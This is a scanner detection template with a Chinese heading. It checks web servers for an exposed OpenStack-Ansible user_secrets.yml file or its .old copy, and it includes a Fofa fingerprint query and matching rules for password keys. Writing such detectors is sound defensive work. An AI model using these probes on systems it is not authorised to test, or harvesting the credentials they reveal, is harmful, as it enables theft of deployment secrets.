漏洞描述
Fofa: icon_hash="786533217"
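# Detection rule: an OpenStack-Ansible user_secrets.yml file (or a leftover
# .old copy) that the web server returns to a plain GET request.
# The nesting below is restored; in the flattened form the repeated
# `request` / `expression` keys collide and the two rules cannot be told apart.
id: openstack-user-secrets

info:
  name: OpenStack User Secrets Exposure
  author: geeknik
  severity: high
  # Not yet confirmed against a known-exposed instance; review hits manually
  # before reporting them.
  verified: false
  description: |-
    A user_secrets.yml file (or a .old copy of it) from an OpenStack-Ansible
    deployment is served by the web server. The file holds the service
    credentials configured for the deployment, so every value in it should be
    treated as compromised: remove the file from the web root, restrict access
    to the deployment configuration directory, and rotate the secrets.
    Fofa: icon_hash="786533217"
  reference:
    - https://docs.openstack.org/project-deploy-guide/openstack-ansible/stein/configure.html
  tags: openstack,config,exposure,files
  created: 2023/11/30

rules:
  # r0: the secrets file under its normal name.
  r0:
    request:
      method: GET
      path: /user_secrets.yml
    # All three conditions must hold, which keeps generic 200 pages
    # (soft-404s, login redirects) from matching:
    #   - HTTP 200
    #   - a key ending in `_password:`
    #   - the text 'OpenStack environment' (presumably from the file's own
    #     header comment; confirm against a reference copy)
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'_password:') &&
      response.body.bcontains(b'OpenStack environment')
  # r1: the same check against a `.old` copy left beside the original.
  r1:
    request:
      method: GET
      path: /user_secrets.yml.old
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'_password:') &&
      response.body.bcontains(b'OpenStack environment')

# Either rule matching is a finding. Only these two paths are requested, so a
# negative result does not show that the file is not exposed elsewhere.
expression: r0() || r1()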